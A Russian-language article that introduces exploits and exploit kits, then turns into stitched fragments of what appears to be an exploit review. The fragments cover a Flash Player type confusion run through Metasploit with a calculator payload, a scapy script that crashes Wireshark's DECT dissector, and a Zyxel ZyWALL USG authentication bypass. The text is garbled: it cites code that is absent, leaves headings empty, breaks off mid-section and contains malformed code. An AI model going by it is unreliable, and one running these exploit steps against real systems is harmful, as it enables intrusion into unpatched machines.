Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом

Эксплойт. Π’ΠΈΠ΄Ρ‹ эксплойтов.

БСгодняшняя ΡΡ‚Π°Ρ‚ΡŒΡ посвящСна эксплойтам ΠΈ ΠΈΡ… Π²ΠΈΠ΄Π°ΠΌ. Π’Π΅Π΄ΡŒ Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎ ΡƒΠ½ΠΈΡ‡Ρ‚ΠΎΠΆΠΈΡ‚ΡŒ Π²Ρ€Π°Π³Π° Π΅Π³ΠΎ Π½Π°Π΄ΠΎ Π·Π½Π°Ρ‚ΡŒ Π² Π»ΠΈΡ†ΠΎ.

Эксплойты β€” это ΠΏΠΎΠ΄Π²ΠΈΠ΄ врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ. Они содСрТат Π΄Π°Π½Π½Ρ‹Π΅ ΠΈΠ»ΠΈ исполняСмый ΠΊΠΎΠ΄, способный Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ»ΠΈ нСсколькими уязвимостями Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠΌ обСспСчСнии Π½Π° локальном ΠΈΠ»ΠΈ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π΅.

НапримСр, Ρƒ вас Π΅ΡΡ‚ΡŒ Π±Ρ€Π°ΡƒΠ·Π΅Ρ€, ΠΈ Π΅ΡΡ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π½Π΅ΠΌ, которая позволяСт ΠΈΡΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ Β«ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄Β», Ρ‚ΠΎ Π΅ΡΡ‚ΡŒ ΡƒΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ ΠΈ Π·Π°ΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ Π½Π΅ΠΊΡƒΡŽ Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ Π½Π° вашСй систСмС Π±Π΅Π· вашСго Π²Π΅Π΄ΠΎΠΌΠ° ΠΈΠ»ΠΈ ΡΠΏΡ€ΠΎΠ²ΠΎΡ†ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΊΠ°ΠΊΠΎΠ΅-Π»ΠΈΠ±ΠΎ ΠΈΠ½ΠΎΠ΅ Π½Π΅ ΠΎΠΆΠΈΠ΄Π°Π΅ΠΌΠΎΠ΅ Π²Π°ΠΌΠΈ ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ систСмы.

Эксплойт ΠΌΠΎΠΆΠ΅Ρ‚ Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΡ‚ΡŒΡΡ Π² Π²ΠΈΠ΄Π΅ исходных тСкстов, исполняСмых ΠΌΠΎΠ΄ΡƒΠ»Π΅ΠΉ ΠΈΠ»ΠΈ словСсного описания использования уязвимости. Он ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ написан Π½Π° любом языкС программирования (Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ часто ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‰ΠΈΠ΅ΡΡ: C/C++, Perl, Python, PHP, HTML+JavaScript).

Как происходит Π·Π°Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅

БущСствуСт Π΄Π²Π° способа заразится эксплойтом. Π’ΠΎ-ΠΏΠ΅Ρ€Π²Ρ‹Ρ…, ΠΏΡ€ΠΈ посСщСнии сайта, содСрТащСго врСдоносный ΠΊΠΎΠ΄ эксплойта. Π’ΠΎ-Π²Ρ‚ΠΎΡ€Ρ‹Ρ…, ΠΏΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΌ Π±Π΅Π·ΠΎΠ±ΠΈΠ΄Π½ΠΎΠ³ΠΎ Π½Π° Π²ΠΈΠ΄ Ρ„Π°ΠΉΠ»Π° со скрытым врСдоносным ΠΊΠΎΠ΄ΠΎΠΌ. Для доставки Ρ‚Π°ΠΊΠΈΡ… Ρ„Π°ΠΉΠ»ΠΎΠ², ΠΊΠ°ΠΊ ΠΏΡ€Π°Π²ΠΈΠ»ΠΎ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ спам ΠΈΠ»ΠΈ Ρ„ΠΈΡˆΠΈΠ½Π³ΠΎΠ²Ρ‹Π΅ письма.

ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ ΠΎΠ½ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ доступ посрСдством уязвимости, эксплойт Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ врСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ с сСрвСра прСступников, ΠΎΡΡƒΡ‰Π΅ΡΡ‚Π²Π»ΡΡŽΡ‰ΠΈΠ΅ ΠΏΠΎΠ΄Ρ€Ρ‹Π²Π½ΡƒΡŽ Π΄Π΅ΡΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ, Ρ‚Π°ΠΊΡƒΡŽ ΠΊΠ°ΠΊ ΠΊΡ€Π°ΠΆΠ° Π»ΠΈΡ‡Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…, использованиС ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π° Π² качСствС элСмСнта Π±ΠΎΡ‚Π½Π΅Ρ‚Π° для рассылки спама ΠΈΠ»ΠΈ выполнСния DDoS-Π°Ρ‚Π°ΠΊ.

Π’ΠΈΠ΄Ρ‹ эксплойтов

ΠŸΡ€ΠΈΠΌΠ΅Ρ€Ρ‹ Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ извСстных Π½Π°Π±ΠΎΡ€ΠΎΠ² эксплойтов:

Angler β€” ΠΎΠ΄ΠΈΠ½ ΠΈΠ· самых слоТных Π½Π°Π±ΠΎΡ€ΠΎΠ² Π½Π° Ρ‡Π΅Ρ€Π½ΠΎΠΌ Ρ€Ρ‹Π½ΠΊΠ΅. Π­Ρ‚ΠΎΡ‚ Π½Π°Π±ΠΎΡ€ эксплойтов своим появлСниСм ΠΈΠ·ΠΌΠ΅Π½ΠΈΠ» ΠΏΡ€Π°Π²ΠΈΠ»Π° ΠΈΠ³Ρ€Ρ‹, послС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ Π½Π°Ρ‡Π°Π» ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Ρ‚ΡŒ антивирусы ΠΈ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ (часто ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹Π΅ экспСртами ΠΏΠΎ бСзопасности ΠΊΠ°ΠΊ ΠΏΡ€ΠΈΠΌΠ°Π½ΠΊΠΈ) ΠΈ Π·Π°Π΄Π΅ΠΉΡΡ‚Π²ΠΎΠ²Π°Ρ‚ΡŒ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ для затруднСния исслСдования. Π­Ρ‚ΠΎ ΠΎΠ΄ΠΈΠ½ ΠΈΠ· Ρ‚Π΅Ρ… Π½Π°Π±ΠΎΡ€ΠΎΠ² эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ быстрСС всСго Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ Π² свой арсСнал Π½Π΅Π΄Π°Π²Π½ΠΎ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ уязвимости Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня, Π° Π΅Π³ΠΎ врСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‚ Π² памяти, Π±Π΅Π· записи Π½Π° ТСстких дисках ΠΆΠ΅Ρ€Ρ‚Π².

Blackhole Kit β€” Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ распространСнная Π²Π΅Π±-ΡƒΠ³Ρ€ΠΎΠ·Π° Π² 2012 Π³ΠΎΠ΄Ρƒ, нацСлСнная Π½Π° уязвимости Π² старых вСрсиях Π±Ρ€Π°ΡƒΠ·Π΅Ρ€ΠΎΠ² Firefox, Chrome, Internet Explorer ΠΈ Safari, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΌΠ½ΠΎΠ³ΠΈΡ… популярных ΠΏΠ»Π°Π³ΠΈΠ½ΠΎΠ², Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ Adobe Flash, Adobe Acrobat ΠΈ Java. ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ Π·Π°ΠΌΠ°Π½ΠΈΠ»ΠΈ ΠΈΠ»ΠΈ ΠΏΠ΅Ρ€Π΅Π½Π°ΠΏΡ€Π°Π²ΠΈΠ»ΠΈ Π½Π° страницу подсадки, Π·Π°ΠΏΡƒΡ‚Π°Π½Π½Ρ‹ΠΉ JavaScript опрСдСляСт содСрТимоС ΠΌΠ°ΡˆΠΈΠ½Ρ‹ ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Ρ‚Π΅ эксплойты, для ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹ΠΉ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ уязвим.

Для Π·Π°Ρ‰ΠΈΡ‚Ρ‹ ΠΎΡ‚ эксплойтов сущСствуСт мноТСство ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΠΎΠΌΠΎΠ³ΡƒΡ‚ Π’Π°ΠΌ Π·Π°Ρ‰ΠΈΡ‚ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€. Π’Π°ΠΊΠΆΠ΅ рСкомСндуСтся Π½Π΅ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°Ρ‚ΡŒ Π½Π΅Π·Π½Π°ΠΊΠΎΠΌΡ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹, письма ΠΈ Π·Π°Ρ…ΠΎΠ΄ΠΈΡ‚ΡŒ Π½Π° Π½Π΅Π·Π½Π°ΠΊΠΎΠΌΡ‹Π΅ сайты.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

ΠžΠ±Π·ΠΎΡ€ эксплойтов

Π‘ΠΎΠ΄Π΅Ρ€ΠΆΠ°Π½ΠΈΠ΅ ΡΡ‚Π°Ρ‚ΡŒΠΈ

Π”Π°Π»ΡŒΠ½Π΅ΠΉΡˆΠΈΠΉ Π°Π½Π°Π»ΠΈΠ· уязвимости, Π²Ρ‹Π·Π²Π°Π½Π½ΠΎΠΉ Π²Ρ‹ΡˆΠ΅ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Π½Ρ‹ΠΌ ΠΊΠΎΠ΄ΠΎΠΌ, ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ ΠΌΡ‹ ΠΈΠΌΠ΅Π΅ΠΌ ΠΎΡ‡Π΅Ρ€Π΅Π΄Π½ΡƒΡŽ Π½Π΅Ρ€Π°Π·Π±Π΅Ρ€ΠΈΡ…Ρƒ с Ρ‚ΠΈΠΏΠΎΠΌ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π°, ΠΏΡ€ΠΎΠΈΠ·ΠΎΡˆΠ΅Π΄ΡˆΡƒΡŽ Π² SharedObject.prototype.getSize(), ΠΊΠΎΠ³Π΄Π° класс Date Ρ€Π°ΡΡˆΠΈΡ€ΡΠ΅Ρ‚ΡΡ Π΄ΠΎΠ±Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΎΠΉ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ, ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Π½ΠΎΠΉ Ρ‡Π΅Ρ€Π΅Π· SharedObject.prototype.getSize. ΠžΠ±ΡŠΠ΅ΠΊΡ‚ Date инициализируСтся Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ΠΌ 1.41466385537348e-315, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ ΠΏΡ€ΠΈ сохранСнии Π² памяти прСобразуСтся Π² 0x11111110, Π° ΠΎΠ½, Π² свою ΠΎΡ‡Π΅Ρ€Π΅Π΄ΡŒ, ΠΏΠΎΠ΄Ρ…ΠΎΠ΄ΠΈΡ‚ для Ρ€Π΅Π°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ Ρ‚Π΅Ρ…Π½ΠΈΠΊΠΈ heap spraying. Когда вызываСтся ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠ°Ρ функция Date.c_fun(), ΡƒΠΏΡ€Π°Π²Π»Π΅Π½ΠΈΠ΅ пСрСдаСтся Π² SharedObject.prototype.getSize(), Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ происходит нСкоррСктная интСрпрСтация ΠΏΠ΅Ρ€Π΅Π΄Π°Π²Π°Π΅ΠΌΠΎΠ³ΠΎ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π° Date ΠΊΠ°ΠΊ ΠΈΠΌΠ΅ΡŽΡ‰Π΅Π³ΠΎ Ρ‚ΠΈΠΏ SharedObject, Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ Ρ‡Π΅Π³ΠΎ ΡΠΎΠ²Π΅Ρ€ΡˆΠ°Π΅Ρ‚ΡΡ ΠΏΠΎΠΏΡ‹Ρ‚ΠΊΠ° ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ Π±Ρ‹Π» ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π½ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ Date (0x11111110), ΠΊΠ°ΠΊ ΡƒΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒ Π½Π° Ρ‚Π°Π±Π»ΠΈΡ†Ρƒ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Ρ… Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ. Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ ΠΈΠ· metasploit, запустим Π½Π° ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Π½ΠΎΠΉ уязвимости машинС ΠΊΠ°Π»ΡŒΠΊΡƒΠ»ΡΡ‚ΠΎΡ€:

msf > use exploit/windows/browser/adobe_flashplayer_flash10o
msf exploit(…) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(…) > set CMD calc.exe
CMD => calc.exe
msf exploit(…) > exploit
[] Exploit running as background job.msf exploit(adobe_fl ashplayer_flash10o) >
[
] Using URL: http://0.0.0.0:8080/Jk32OyCPJ0NUR6B
[] Local IP: http://192.168.2.20:8080/Jk32OyCPJ0NUR6B
[
] Server started.

Π‘Π΅Ρ€Π²Π΅Ρ€ Π·Π°ΠΏΡƒΡ‰Π΅Π½. Π’Π΅ΠΏΠ΅Ρ€ΡŒ ΠΎΡ‚ нас трСбуСтся Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΏΡ€ΠΎΠΉΡ‚ΠΈ ΠΏΠΎ прСдоставлСнной ссылкС (http://192.168.2.20:8080/Jk32OyCPJ0NUR6B) ΠΈ ΠΌΡ‹ смоТСм смирСнно, Π·Π°Ρ‚Π°ΠΈΠ² Π΄Ρ‹Ρ…Π°Π½ΠΈΠ΅ Π½Π°Π±Π»ΡŽΠ΄Π°Ρ‚ΡŒ Π·Π° Ρ‚Π΅ΠΌ, ΠΊΠ°ΠΊ Internet Explorer прСвращаСтся Π² ΠΊΠ°Π»ΡŒΠΊΡƒΠ»ΡΡ‚ΠΎΡ€.

Targets

IE 6/7 Π½Π° Windows XP SP3 ΠΈ Windows Vista.

Solution

ΠžΠ±Π½ΠΎΠ²ΠΈΡ‚ΡŒ Adobe Flash Player.

pkt_bfield прСдставляСт собой структуру Ρ‚ΠΈΠΏΠ° dect_bfield, описаниС ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅ΠΌ Π½ΠΈΠΆΠ΅:

struct dect_bfi eld
<
guint8 Data[128];
guint8 Length;
>;

Как Π²ΠΈΠ΄Π½ΠΎ, происходит ΠΊΠΎΠΏΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ Π΄Π°Π½Π½Ρ‹Ρ… ΠΏΠ°ΠΊΠ΅Ρ‚Π° Π² 128-Π±Π°ΠΉΡ‚Π½Ρ‹ΠΉ Π±ΡƒΡ„Π΅Ρ€ Data, Ρ€Π°ΡΠΏΠΎΠ»Π°Π³Π°ΡŽΡ‰ΠΈΠΉΡΡ Π½Π° стСкС. Для Ρ‚ΠΎΠ³ΠΎ Ρ‡Ρ‚ΠΎΠ±Ρ‹ Π»ΠΈΡ†Π΅Π·Ρ€Π΅Ρ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π²ΠΎΠΎΡ‡ΠΈΡŽ, Π½Π°ΠΌ Π½Π°Π΄ΠΎ Π±ΡƒΠ΄Π΅Ρ‚ ΡΡ„ΠΎΡ€ΠΌΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ pcap-Ρ„Π°ΠΉΠ» ΠΈ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ Π΅Π³ΠΎ Π½Π° Π½ΡƒΠΆΠ½Ρ‹ΠΉ интСрфСйс. НапримСр, этого ΠΌΠΎΠΆΠ½ΠΎ Π΄ΠΎΠ±ΠΈΡ‚ΡŒΡΡ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΏΡ€Π΅ΠΊΡ€Π°ΡΠ½ΡƒΡŽ Π²Π΅Ρ‰ΡŒ ΠΏΠΎΠ΄ Π½Π°Π·Π²Π°Π½ΠΈΠ΅ΠΌ scapy:

#!/usr/bin/env python
import sys
from scapy import * wrpcap(«test.pcap»,Ether(type=0x2323)/(«A»*1000))

ЗапускаСм wireshark, заставляСм Π΅Π³ΠΎ ΡΠ»ΡƒΡˆΠ°Ρ‚ΡŒ Π½ΡƒΠΆΠ½Ρ‹ΠΉ Π½Π°ΠΌ интСрфСйс ΠΈ шлСм Π΅ΠΌΡƒ ΠΏΡ€ΠΈΠ²Π΅Ρ‚ Π² Π²ΠΈΠ΄Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ сформированного ΠΏΠ°ΠΊΠ΅Ρ‚Π°:

Π ΠΎΠ²Π½ΠΎ ΠΎΠ΄ΠΈΠ½ ΠΏΠ°ΠΊΠ΅Ρ‚ β€” ΠΈ wireshark с Π³Ρ€ΠΎΡ…ΠΎΡ‚ΠΎΠΌ ΠΏΠ°Π΄Π°Π΅Ρ‚ Π½ΠΈΡ†. Ну Π° Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ, Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡΡ Π±Π»Π°Π³Π°ΠΌΠΈ Ρ†ΠΈΠ²ΠΈΠ»ΠΈΠ·Π°Ρ†ΠΈΠΈ Π² Π²ΠΈΠ΄Π΅ модуля для metasploit ΠΈ сформируСм эксплоит с классичСской, ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΎΠΉ Π² Π²ΠΈΠ΄Π΅ запуска ΠΊΠ°Π»ΡŒΠΊΡƒΠ»ΡΡ‚ΠΎΡ€Π°:

ЗапускаСм wireshark, ставим ΠΏΡ€ΠΎΡΠ»ΡƒΡˆΠΊΡƒ интСрфСйса. ΠžΡ‚ΠΏΡ€Π°Π²Π»ΡΠ΅ΠΌ врСдоносный ΠΏΠ°ΠΊΠ΅Ρ‚:

Targets

Solution

ΠœΠ½ΠΎΠΆΠ΅ΡΡ‚Π²Π΅Π½Π½Ρ‹Π΅ уязвимости Π² Zyxel Zywall USG

CVSSV2

Brief

БСрия ΠΆΠ΅Π»Π΅Π·ΠΎΠΊ ZyWALL USG β€” Π½ΠΎΠ²ΠΎΠ΅ комплСксноС Ρ€Π΅ΡˆΠ΅Π½ΠΈΠ΅ ΠΎΡ‚ ZyXEL для обСспСчСния ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ бСзопасности ΠΈ управлСния Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠΎΠΌ, Π²ΠΊΠ»ΡŽΡ‡Π°Ρ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΡƒΡŽ Π½Π°ΡΡ‚Ρ€Π°ΠΈΠ²Π°Π΅ΠΌΡƒΡŽ Π·Π°Ρ‰ΠΈΡ‚Ρƒ ΠΎΡ‚ спама, ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒ полосы пропускания для Ρ€Π°Π·Π½ΠΎΠΎΠ±Ρ€Π°Π·Π½Ρ‹Ρ… ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ΠΎΠ² cΠ΅Ρ‚ΠΈ, ΠΏΡ€Π΅Π΄ΠΎΡ‚Π²Ρ€Π°Ρ‰Π΅Π½ΠΈΠ΅ Π²Ρ‚ΠΎΡ€ΠΆΠ΅Π½ΠΈΠΉ ΠΈ Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒ ΡƒΠ΄Π°Π»Π΅Π½Π½Ρ‹Ρ… ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠΉ ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Ρ… частных сСтСй. Π’ Π½Π°Ρ‡Π°Π»Π΅ мая нСмСцкая Π³Ρ€ΡƒΠΏΠΏΠ° RedTeam Pentesting ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π»Π° ΠΎΡ‚Ρ‡Π΅Ρ‚ ΠΎ Π΄Π²ΡƒΡ… уязвимостях Π² этих устройствах, Π½Π°ΠΉΠ΄Π΅Π½Π½Ρ‹Ρ… ΠΈΠΌΠΈ Π² Ρ…ΠΎΠ΄Π΅ ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΈΠ· пСнтСстов: ΠΎΠ±Ρ…ΠΎΠ΄ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ΠΈ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ эксплуатации ΠΏΠ΅Ρ€Π²ΠΎΠΉ уязвимости Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ ΡΠΊΠ°Ρ‡ΠΈΠ²Π°Ρ‚ΡŒ ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ Π² устройства, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠΌΠ΅Π½ΡΡŽΡ‚ΡΡ автоматичСски. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ использования Π²Ρ‚ΠΎΡ€ΠΎΠ³ΠΎ Π±Π°Π³Π° ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ с ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½Ρ‹ΠΌΠΈ ΠΏΡ€Π°Π²Π°ΠΌΠΈ ΠΌΠΎΠΆΠ΅Ρ‚ ΡΡ‚Π°Ρ‚ΡŒ Π°Π΄ΠΌΠΈΠ½ΠΎΠΌ ΠΈ ΠΌΠ΅Π½ΡΡ‚ΡŒ Ρ‡Π΅Ρ€Π΅Π· Π²Π΅Π±-интСрфСйс Π»ΡŽΠ±Ρ‹Π΅ настройки.

Exploit

ОбновлСния ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΎΠΊ для устройств ZyXEL ZyWALL USG ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²Π»ΡΡŽΡ‚ собой ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹ΠΉ zip-Π°Ρ€Ρ…ΠΈΠ², Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΌ Ρ‚Π°ΠΊΠΆΠ΅ находятся Π΅Ρ‰Π΅ Π΄Π²Π° Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… zip-Π°Ρ€Ρ…ΠΈΠ²Π° с основной ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΎΠΉ. НапримСр, Π°Ρ€Ρ…ΠΈΠ² с ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΎΠΉ 2.21(BQD.2) для ZyWALL USG 20 (Β«ZyWALL USG 20_2.21(BDQ.2)C0.zipΒ») содСрТит ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ Ρ„Π°ΠΉΠ»Ρ‹:

Π€Π°ΠΉΠ»Ρ‹ 221BDQ2C0.bin ΠΈ 221BDQ2C0.db, нСсмотря Π½Π° ΡƒΠΊΠ°Π·Π°Π½Π½ΠΎΠ΅ Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΠ΅, ΡΠ²Π»ΡΡŽΡ‚ΡΡ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΌΠΈ zip-Π°Ρ€Ρ…ΠΈΠ²Π°ΠΌΠΈ (кстати, Π² Π°Π½Π°Π»ΠΈΠ·Π΅ Ρ‚ΠΈΠΏΠ° Ρ„Π°ΠΉΠ»Π° всСм линуксоидам ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΠΎΠΌΠΎΡ‡ΡŒ стандартная ΡƒΡ‚ΠΈΠ»ΠΈΡ‚Π° /usr/bin/file). МоТно ΠΏΡ€ΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ список Ρ„Π°ΠΉΠ»ΠΎΠ² Π² этих Π°Ρ€Ρ…ΠΈΠ²Π°Ρ…:

